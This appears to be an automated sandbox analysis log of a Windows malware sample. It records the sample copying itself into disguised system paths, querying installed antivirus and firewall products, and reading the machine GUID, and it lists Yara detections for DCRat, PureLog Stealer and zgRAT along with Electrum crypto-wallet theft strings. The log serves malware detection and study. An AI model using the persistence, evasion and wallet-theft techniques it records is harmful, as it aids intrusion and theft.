                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\GameBarPresenceWriter\services.exe VolumeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeQueries volume information: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe VolumeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeQueries volume information: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe VolumeInformation
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeQueries volume information: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe VolumeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\GameBarPresenceWriter\services.exe VolumeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeQueries volume information: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe VolumeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\GameBarPresenceWriter\services.exe VolumeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeQueries volume information: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe VolumeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\GameBarPresenceWriter\services.exe VolumeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeQueries volume information: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe VolumeInformation
                    Source: C:\Windows\GameBarPresenceWriter\services.exeQueries volume information: C:\Windows\GameBarPresenceWriter\services.exe VolumeInformation
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe VolumeInformation
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeQueries volume information: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe VolumeInformation
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeQueries volume information: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe VolumeInformation
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeQueries volume information: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: services.exe, 00000010.00000002.3022554541.000000001CE96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Defender\MsMpeng.exe
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected DCRat
                    Source: Yara matchFile source: 00000010.00000002.2938691750.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2938691750.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1721629037.0000000013120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Z4D3XAZ2jB.exe PID: 2004, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: services.exe PID: 2308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ZDtOzYsYYWKWEhNYzFc.exe PID: 7384, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.Z4D3XAZ2jB.exe.1b1e0000.22.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Z4D3XAZ2jB.exe.1b1e0000.22.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1739517961.000000001B1E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1721629037.000000001272D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected zgRAT
                    Source: Yara matchFile source: 0.2.Z4D3XAZ2jB.exe.1b1e0000.22.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Z4D3XAZ2jB.exe.1b1e0000.22.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1739517961.000000001B1E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                    Source: services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\8
